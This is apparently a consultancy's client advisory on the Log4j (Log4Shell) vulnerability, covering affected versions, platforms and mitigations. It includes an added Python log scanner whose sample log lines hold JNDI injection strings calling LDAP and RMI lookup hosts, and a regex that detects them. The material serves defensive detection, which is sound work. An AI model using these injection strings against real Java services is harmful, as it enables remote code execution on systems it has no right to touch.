
As you have likely heard by now, the broader business community is susceptible to a software vulnerability that, if exploited, can impact the majority of our organizations. You can view the original article regarding this vulnerability on the NIST website here.

Please read on for more details, but if you believe your business has been compromised as a result of this vulnerability, please contact your JKJ team immediately to discuss next steps.

Less Technical Explanation:

Identified on December 9th by a security researcher, the vulnerability in Log4j could allow an unauthorized user to gain elevated privileges on a computer, and potentially allow unauthenticated users to execute malicious commands on affected systems. The Log4j utility is commonly included in Java-based third-party software and in multiple Apache web frameworks, so the vulnerability impacts a large number of web applications. It can affect both Internet-facing systems and, depending on how logging is set up, internal systems as well.

More Technical Explanation:

Log4j is a popular open-source Java logging library which sits under many applications and is incorporated into Apache projects such as Apache Struts 2, Apache Solr, Apache Druid and Apache Flink. It uses the Java Naming and Directory Interface (“JNDI”) and supports the Lightweight Directory Access Protocol (LDAP). JNDI has been part of Java since the late 1990s and provides an abstract interface for different name resolution and directory services. It is Log4j's LDAP JNDI handler that allows remote code injection.

Any Java-based application may be vulnerable, but the following platforms running Java have been identified as vulnerable:

  • Amazon Web Services (AWS) Lambda
  • Apache Software Foundation (Flink)
  • Debian Project (GNU/Linux)
  • FreeBSD
  • IBM (WebSphere Application Server)
  • NetApp (Cloud Manager, SnapCenter)
  • Red Hat
  • Sophos (Cloud Optix)
  • Ubiquiti
  • VMware (Horizon, vCenter Server)

Impacted versions are all releases of Log4j 2 from 2.0-beta9 through 2.14.1, including where Log4j 2 is bundled in platforms such as Apache Struts. Version 1 of Log4j is also impacted if the JMS Appender is in use.

The threat actor must have access to an endpoint or interface that would enable them to send the exploit string and a log statement that records the string from that request.

Remediation:

All organizations should ensure the following:

  1. Review all application and logging servers that may leverage Log4j. This can impact both publicly facing servers and internal servers, depending on where logs travel and where Log4j is used to write them. It is important to understand which logging could capture malicious requests at the web front end and then record them on other, vulnerable servers further inside the network.
  2. Assess third party products in your environment and identify whether they are vulnerable. You can monitor security centers for the products or contact your account representatives for guidance.
  3. Ensure your network security technology is blocking all known indicators for this vulnerability.
  4. Ensure EDR (endpoint detection & response) technology is running on all servers.
  5. Monitor log files for the string “{jndi”. This represents scanning activity which could lead to the compromise of the system.
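The following added example (not part of the JKJ advisory) shows one way to implement the log check in step 5: it scans access-log lines for the “{jndi” marker case-insensitively, records the requesting IP, and pulls out the lookup scheme and destination host so the host can be fed to the network blocking in step 3. The log lines and addresses are constructed samples.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# The marker the advisory says to monitor for ("{jndi"), matched
# case-insensitively; also captures the lookup scheme and its target host.
JNDI_RE = re.compile(
    r"\{jndi:(?P<scheme>[a-z]+):/*(?P<target>[^/}\s]+)", re.IGNORECASE)
# Leading client address of a Combined Log Format line.
CLIENT_IP_RE = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3})\s")

@dataclass
class Finding:
    line_no: int
    source_ip: Optional[str]   # requesting client, if the line carries one
    scheme: Optional[str]      # e.g. ldap, rmi, dns
    target: Optional[str]      # host[:port] the lookup would connect to
    raw: str

def scan_log_lines(lines: Iterable[str]) -> List[Finding]:
    """Return one Finding per line containing a JNDI lookup marker."""
    findings: List[Finding] = []
    for n, line in enumerate(lines, 1):
        if "{jndi" not in line.lower():
            continue
        m = JNDI_RE.search(line)
        ip = CLIENT_IP_RE.match(line)
        findings.append(Finding(
            line_no=n,
            source_ip=ip.group(1) if ip else None,
            scheme=m.group("scheme").lower() if m else None,
            target=m.group("target") if m else None,
            raw=line.rstrip()))
    return findings

def hosts_to_block(findings: Iterable[Finding]) -> List[str]:
    """Distinct lookup destinations (port stripped) for an egress block list."""
    return sorted({f.target.split(":")[0] for f in findings if f.target})

# Constructed sample log lines (not real traffic); RFC 5737 test addresses.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:10:15:32 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:10:15:40 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.23:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:10:16:01 +0000] "GET /login?user=${JNDI:rmi://scanner.example.net/x} HTTP/1.1" 404 0 "-" "curl/7.68"',
]

if __name__ == "__main__":
    for f in scan_log_lines(SAMPLE_LOG):
        print(f"line {f.line_no}: src={f.source_ip} scheme={f.scheme} target={f.target}")
    print("hosts to block:", hosts_to_block(scan_log_lines(SAMPLE_LOG)))
```

Any hit is worth triage regardless of whether the target parses, since the marker alone indicates scanning activity against the system.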

If you manage an application using the Log4j package:

  1. If you are unsure which version you are running, search for the file hashes listed here to determine if you are potentially vulnerable.
  2. Upgrade to the latest version log4j v2.15 (this will fix the vulnerability).
  3. If you are using a vulnerable version and cannot upgrade, do one of the following:
    1. For releases >=2.10: Set the property “log4j2.formatMsgNoLookups” or “LOG4J_FORMAT_MSG_NO_LOOKUPS” to “true”.
    2. For releases 2.0-beta9 to 2.10.0: Remove the JndiLookup class from the classpath.

Additional information on mitigations is available here. Additionally, CrowdStrike provides additional technical analysis and mitigation recommendations to consider here and CISA gives direction here.

If there is a possibility your business has been compromised as a result of this vulnerability, please contact your JKJ team immediately to discuss next steps.

If you have questions or if you would like additional information, please complete the form below: